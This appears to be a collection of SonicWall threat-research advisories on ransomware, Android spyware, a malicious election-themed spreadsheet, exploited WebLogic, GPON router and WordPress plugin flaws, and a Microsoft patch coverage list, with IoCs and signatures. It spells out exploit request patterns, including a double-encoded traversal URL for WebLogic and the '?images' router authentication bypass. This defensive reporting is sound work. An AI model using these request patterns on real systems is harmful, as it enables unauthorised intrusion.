Posts

Ransomware spares no one except if you are from Russia, Kazakhstan or Ukraine

/in /by

The Sonicwall Capture Labs Research team has observed another ransomware being circulated in the wild recently. It was first spotted earlier this year but has not gained much traction then. Interestingly, this not so popular ransomware promises to decrypt your files if you are from Russia, Kazakhstan or Ukraine and does not impose a time limit on when victims can send payment to decrypt files.

Infection Cycle:

Erica ransomware comes as an executable that use the following icons:

Upon execution, it connects to a remote server 178.170.219.108.

It spawns a legitimate file to carry out its malicious functionality. During our analysis it used cvtres.exe, a Microsoft Windows file which is part of the C++ tool chain. (See more details here).

Cvtres.exe then encrypts the victim’s files and appends random characters to the file’s original name.

This ransomware uses the Microsoft Enhanced RSA and AES Cryptographic Provider to create keys and encrypt data using the RSA algorithms.

It then zips up the entire %users% directory and names it with a random name. This is then sent out to a remote server.

A ransom note is created in every directory with which files have been encrypted. They promise to help with decryption if you are from Russia, Kazakhstan or Ukraine. And also do not impose a time limit on when you decide to pay to decrypt your files.

An email is included in the note but is base64 encoded and reads:

erica_affiliate @ protonmail.com

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Erica.RSM (Trojan)
  • GAV: Erica.RSM_1 (Trojan)
  • GAV: Erica.RSM_2 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

CVE-2020-14882 Oracle WebLogic Remote Code Execution Vulnerability Exploited in the Wild

/in /by

SonicWall Capture Labs Threat Research team has observed that the recent remote code execution vulnerability reported in Oracle WebLogic Server being exploited in the wild. This vulnerability is due to improper sanitization of user-supplied data via HTTP.

Oracle WebLogic is one of the widely used Java application servers. It helps building and deploying distributed web  applications for large enterprise web applications.

Vulnerability | CVE-2020-14882

A remote code execution vulnerability exist in Oracle WebLogic Server. The vulnerability is due to
improper validation of user supplied data in com.bea.console.utils.MBeanUtilsInitSingleFileServlet and
com.bea.console.handles.HandleFactory class.

The vulnerable class com.bea.console.handles.HandleFactory can be triggered using a HTTP request with the following structure:

http://<target>/console/console.portal?_nfpb=true&_pageLabel=HomePage1&handle=<class_name>

MBeanUtilsInitSingleFileServlet does not implement a proper mechanism to filter out the directory traversal
characters “..” nor does it check if the user is authenticated. As a consequence, an attacker can
access “/console/css/%252E%252E%252Fconsole.portal” where “%252E” is double url encoded value of “..”
to bypass the authentication and provide a request parameter containing the word “handle” where the
parameter value is the name of a Class that may be used maliciously and will be instantiated by the
com.bea.console.handles.HandleFactory class.

This exploit allows an unauthenticated attacker to achieve remote code execution on a vulnerable Oracle WebLogic Server by sending a crafted HTTP GET request. Successful exploitation results in the execution of arbitrary code under the security context of the user running WebLogic Server.

Exploit Requests

The following exploits are currently being used:

http://x.x.x.x:7001

Trend Chart:

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 14003 Oracle WebLogic Server Remote Command Execution 3
IPS: 15218 Oracle WebLogic Server Remote Command Execution 2

 

Exerwa ransomware leaked from CTF hacker event

/in /by

The SonicWall Capture Labs threat research team has observed reports of Hungarian PC users infected by Exerwa ransomware. It is reported that Exerwa is CTF malware that emerged from a Capture-the-Flag event where hackers are tasked to build functional ransomware in the shortest possible time. Unfortunately, some code from this event has ended up in the wild. The code is very basic and the initial infection vector is via a word document using macros.

 

Infection Cycle:

 

Upon opening the Word document the following page is shown:

 

A .bat script can be seen on the second page:

 

Once the macro has run, the following files are dropped on to the system:

  • %USERPROFILE%\Exerwa\decode.bat
  • %USERPROFILE%\Exerwa\exec.enc
  • %USERPROFILE%\Exerwa\script.enc
  • %USERPROFILE%\Exerwa\exec.exe
  • %USERPROFILE%\Exerwa\script.ps1

 

script.enc contains the following encrypted data:

 

exec.enc contains the following encrypted data:

 

decode.bat is run.  It contains the following commands:

 

 

exec.enc is decrypted using the built-in Windows certutil program and exec.exe is created.  It is a non-malicious generic Xor encryption tool by Luigi Auriemma:

 

script.enc is decrypted with certutil and script.ps1 is created.  It contains the following powershell script:

 

This script contains a loop to encrypt files within a given directory using the Xor tool.  As shown in the script, “.exerwa” is appended to the names of encrypted files.

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Exerwa.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

LockDown ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs Threat Research team observed reports of a new variant family of LOCKDOWN ransomware actively spreading in the wild.

The LOCKDOWN ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • %App.path%\ [Name]. <LOCKDOWN >
    • %App.path%\ [Name]. <bondy>
    • %App.path%\ [Name]. <Connect>
    • %App.path%\ [Name]. <sext>

Once the computer is compromised, the ransomware runs the following commands: (Actual Source code)

When LOCKDOWN is started it will create and assign a unique ID number to the victim then scan all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and only encrypt those files that match the following extensions:

The ransomware encrypts all the files and appends the [LOCKDOWN] extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following picture containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blackheart.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Attackers actively targeting vulnerable Dasan GPON home routers

/in /by

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in Dasan GPON home routers. DASAN Zhone Solutions is a provider of  network access solutions for service provider and enterprise networks. The company provides a wide array of reliable, cost-effective networking technologies—including broadband access, Ethernet switching, Passive Optical LAN and software-defined networks.
Attackers are targeting following two vulnerabilities in GPON home routers:

Authentication Bypass Vulnerability
It is possible to bypass authentication simply by appending “?images” to any URL of the device that requires authentication. For example by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. Attacker can then manage the device.(CVE-2018-10561)

Command Injection Vulnerability
Command Injection vulnerability exists in Dasan GPON home routers via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI.The router saves ping results in tmp directory and displays them when user visits diag.html. This can be used to inject and execute commands.(CVE-2018-10562)

Following exploit is spotted in the wild

The attacker takes advantage of the above vulnerabilities to bypass authetication by appending “?images” to the POST request. Then the attacker downloads a malicious executable by injecting “wget”  command. This is saved in the tmp directory and is executed when a user visits diag.html page.

SonicWall Capture Labs provides protection against this threat via following signatures:

    • IPS 13340:Dasan GPON Routers Command Injection
    • GAV:Mirai.H

Threat Graph

IoCs:
59.99.45.126
117.213.46.186
117.194.165.174
112.27.124.174
42.234.109.14
2e4506802aedea2e6d53910dfb296323be6620ac08c4b799a879eace5923a7b6

A quick look at Shodan reveals thousands of vulnerable devices

Android spyware Bahamut spreads disguised as Voice of Islam app

/in /by

A spy campaign for Android was found spreading actively via the link – voiceofislam.info – which has been taken down. Cache page for this link shows weblinks which led the user to download a malicious apk file:

Original page images, posted on Twitter:

 

Infection cycle

Upon installation and execution, the app does not appear to perform a lot of activities to the user. In the background it contacts the attacker with device IMEI, this might be the registration mechanism usually observed in Android malware:

Contacts stored on the device are siphoned back to the attacker:

 

Spyware capabilities

This application contains a number of spyware components which aim at extracting sensitive user related information and sending it back to the attackers server – voiceofislam.info

Call logs:

 

Contacts:

 

Device information:

 

Media files with support for a number of extensions:

Interestingly the spyware has support for .crypt11 and .crypt12 file extensions which are encrypted Whatsapp chat history databases.

 

Location:

String encryption

This malware uses Blowfish encryption to encrypt strings using the key 9;_R%@c`gZxL9M{j”. This key has been linked with the Android spyware campaign Bahamut.

 

Network investigation

We observed the following VT graph for the domain voiceofislam.info:

The second malicious app identified from this graph – 6ef7ea19a000f2570c30ae3814b8482f – contains similar functionality as the one analyzed.

Upon further digging, we found another app related to this campaign via Koodous:

 

This app  ( MD5 – 9368dd657e410f8a9ba2b71c95cc0777) contains a similar code and component structure related to the previous app, but with a minor change. It uses a secret key K&M9B#)O/R\u0007=P%hA which again coincides with the known keys associated with Bahamut campaign.

Overall this malicious spyware aims at stealing sensitive user information from the infected devices. This malware is part of a larger campaign Bahamut, we can expect more spyware from this campaign to spread using different means in future.

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOSBahamut.NS (Trojan)
  • GAV: AndroidOSBahamut.SM (Trojan)

 

Indicators of Compromise (IOC):

Microsoft Security Bulletin Coverage for November 2020

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2020. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2020-16998 DirectX Elevation of Privilege Vulnerability
ASPY 5907:Malformed-File exe.MP.131

CVE-2020-17010 Win32k Elevation of Privilege Vulnerability
ASPY 125:Malformed-File exe.MP.165
CVE-2020-17038 Win32k Elevation of Privilege Vulnerability
ASPY 124:Malformed-File exe.MP.164

CVE-2020-17047 Windows Network File System Denial of Service Vulnerability
IPS 15220:Windows Network File System Denial of Service (CVE-2020-17047)

CVE-2020-17051 Windows Network File System Remote Code Execution Vulnerability
IPS 15223:Windows Network File System Remote Code Execution (CVE-2020-17051)

CVE-2020-17052 Scripting Engine Memory Corruption Vulnerability
IPS 15221:Scripting Engine Memory Corruption Vulnerability (CVE-2020-17052)

CVE-2020-17053 Internet Explorer Memory Corruption Vulnerability
IPS 15222:Internet Explorer Memory Corruption Vulnerability (CVE-2020-17053)

CVE-2020-17056 Windows Network File System Information Disclosure Vulnerability
IPS 15226:Windows NFS Information Disclosure (CVE-2020-17056)

CVE-2020-17057 Windows Win32k Elevation of Privilege Vulnerability
ASPY 123:Malformed-File exe.MP.161

CVE-2020-17061 Microsoft SharePoint Remote Code Execution Vulnerability
ASPY 126:Malformed-File exe.MP.166
IPS 15224: Microsoft SharePoint Remote Code Execution (CVE-2020-17061) 1
IPS 15225: Microsoft SharePoint Remote Code Execution (CVE-2020-17061) 2

CVE-2020-17087 Windows Kernel Local Elevation of Privilege Vulnerability
ASPY 117:Malformed-File exe.OT.1
GAV:CVE-2020-17087

CVE-2020-17088 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 122:Malformed-File exe.MP.160

Following vulnerabilities do not have exploits in the wild :
CVE-2020-1325 Azure DevOps Server and Team Foundation Services Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-1599 Windows Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-16970 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16979 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16981 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16982 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16983 Azure Sphere Tampering Vulnerability
There are no known exploits in the wild.
CVE-2020-16984 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16985 Azure Sphere Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16986 Azure Sphere Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-16987 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16988 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16989 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16990 Azure Sphere Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16991 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16992 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16993 Azure Sphere Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-16994 Azure Sphere Unsigned Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-16997 Remote Desktop Protocol Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-16999 Windows WalletService Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17000 Remote Desktop Protocol Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17001 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17004 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17005 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17006 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17007 Windows Error Reporting Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17011 Windows Port Class Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17012 Windows Bind Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17013 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17014 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17015 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17016 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17017 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17018 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17019 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17020 Microsoft Word Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17021 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2020-17024 Windows Client Side Rendering Print Provider Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17025 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17026 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17027 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17028 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17029 Windows Canonical Display Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17030 Windows MSCTF Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17031 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17032 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17033 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17034 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17035 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17036 Windows Function Discovery SSDP Provider Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17037 Windows WalletService Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17040 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17041 Windows Print Configuration Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17042 Windows Print Spooler Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17043 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17044 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17045 Windows KernelStream Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17046 Windows Error Reporting Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-17048 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17049 Kerberos Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17054 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17055 Windows Remote Access Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17058 Microsoft Browser Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2020-17060 Microsoft SharePoint Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17062 Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17063 Microsoft Office Online Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2020-17064 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17065 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17066 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17067 Microsoft Excel Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17068 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17069 Windows NDIS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17070 Windows Update Medic Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17071 Windows Delivery Optimization Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17073 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17074 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17075 Windows USO Core Worker Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17076 Windows Update Orchestrator Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17077 Windows Update Stack Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2020-17078 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17079 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17081 Microsoft Raw Image Extension Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17082 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17083 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17084 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17085 Microsoft Exchange Server Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2020-17086 Microsoft Raw Image Extension Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17090 Microsoft Defender for Endpoint Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2020-17091 Microsoft Teams Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17100 Visual Studio Tampering Vulnerability
There are no known exploits in the wild.
CVE-2020-17101 HEIF Image Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17102 WebP Image Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2020-17104 Visual Studio Code JSHint Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17105 AV1 Video Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17106 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17107 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17108 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17109 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17110 HEVC Video Extensions Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2020-17113 Windows Camera Codec Information Disclosure Vulnerability
There are no known exploits in the wild.

Ragnar Locker Ransomware

/in /by

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity for Ragnar Locker Ransomware.

Cyberattacks using Ragnar Ransomware have impacted Biological E Ltd, Capcom, and Campari Group.
A description of the corporations that were hit last week and this week are below:

  • Biological E limited is a privately held biopharmaceutical company based in Hyderabad, Telangana, India.
  • Capcom Co., Ltd. is a Japanese video game developer and publisher.
  • Campari, is an Italian company active since 1860 in the branded beverage industry. It produces spirits, wines, and soft drinks.

Ragnar injects a module capable of collecting sensitive data from infected machines and uploads the data it finds to their servers. The ransomware notifies the victim of the files that will be released to the public if the ransom is not paid.

Ransomware document:

Further down the document:

Ragnar Key is at the bottom of the document:

Static Layer, Information:

Overview of sample, checking for any corruption within the PE file format.

Command-Line overview of sample:

Dynamic Information:

Shellcode Buffer:

Shellcode Entry:

Some Shellcode Functionality:

Anti-Debugging Block:

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

  • GAV: RagnarLocker.RSM_2 (Trojan)

Appendix:

Sample SHA256 Hash: 0766beb30c575fc68d1ca134bd53c086d2ce63b040e4d0bbd6d89d8c26ca04f6

Fake Election-related Document found spreading Malware

/in /by

As the world watches for the outcome of the U.S. election and election night turns into election days, cybercriminals are riding the wave using social engineering tactics. The Sonicwall Capture Labs Research team has analyzed a malicious document befittingly named “ElectionInterference” which when opened will download additional malicious software.

Infection Cycle:

The file comes as a Microsoft Excel spreadsheet possibly via spam as an email attachment using the following filename:

ElectionInterference_[0-9]{10}.xls

 

Once executed, the victim will be instructed to enable editing and enable content.

When enabled the auto_open macro runs in the background. This is hidden within one of the sheets as seen in the screenshots below:

It will then create a directory and download a file from a remote server and save it as fiskat.exe in the newly created folder.

  • C:/Temp/temp2/fiskat.exe

This new Trojan will then be executed and perform malicious activities such as gathering data from the victim’s machine. During analysis, we have observed that it created a .dat file with some encrypted data.

It comes as no surprise that cybercriminals take advantage of a crisis, such as the growing number of malware observed using the pandemic or current events such as the BLM protests and now the U.S. Presidential election to spread malware.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Malspam.VBA (Trojan)
  • GAV: Qbot.A (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

 

 

 

CVE-2020–25213: WordPress plugin wp-file-manager actively being exploited in the wild

/in /by

WordPress is a free and open-source content management system written in PHP. WordPress is used by more than 60 million websites. 38% of the web is built on WordPress. Its plugin architecture allows users to extend the features and functionality to tailor the websites to their specific needs.

Vulnerability | CVE-2020-25213:

An improper access control vulnerability has been reported in the File Manager plugin for WordPress. The vulnerability is due to improper access control of connector.minimal.php file while uploading files. An unauthenticated remote attacker can exploit this vulnerability by uploading a file on the target system. A successful attack could result in code execution in the security context of the target WordPress server.

The vulnerable program is connector.minimal.php in wp-content/plugins/wp-file-manager/lib/php/. This vulnerability is due to the fact that the file connector.minimal.php can be accessed by an unauthenticated attacker. connector.minimal.php file loads elFinderConnector.class.php which is capable of reading HTTP request parameters and facilitating the execution of File Manager features such as file upload.  connnector.minimal.php does not implement any authorization mechanisms such as checking the privileges of the user making the request. As a result, an unauthenticated attacker can upload arbitrary files to the server, such as a malicious PHP file, potentially leading to the execution of arbitrary code.

Exploit:

In the above exploit request, the php file “test_php_info.php” can be replaced with any arbitrary file we want to upload on the server. Other than “upload” command, “mkfile and “put” commands available in elFinder could be used to write a PHP file into the file directory and later perform arbitrary remote code execution.

Trend Chart:

Patch:
The below products are affected by this vulnerability.
• File Manager Pro File Manager Plugin for WordPress 6.0 to 6.8
• File Manager Pro File Manager Pro Plugin for WordPress 7.6 to 7.8

The File Manager plugin patched the issue by removing the “lib/php/connector.minimal.php” file from the plugin. Manually removing this file should also prevent attackers from exploiting this vulnerability.

Refer vendor advisory here

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15205 WordPress wp-file-manager Plugin Remote Code Execution

Indicators of compromise:
13.85.84.182
176.113.115.89
193.27.229.26
13.82.220.36
20.185.0.202
18.207.254.243
51.11.136.167
52.186.156.31
34.226.244.53
18.207.224.249
37.59.35.206
160.20.147.136
161.35.90.11
13.66.185.182
104.248.238.198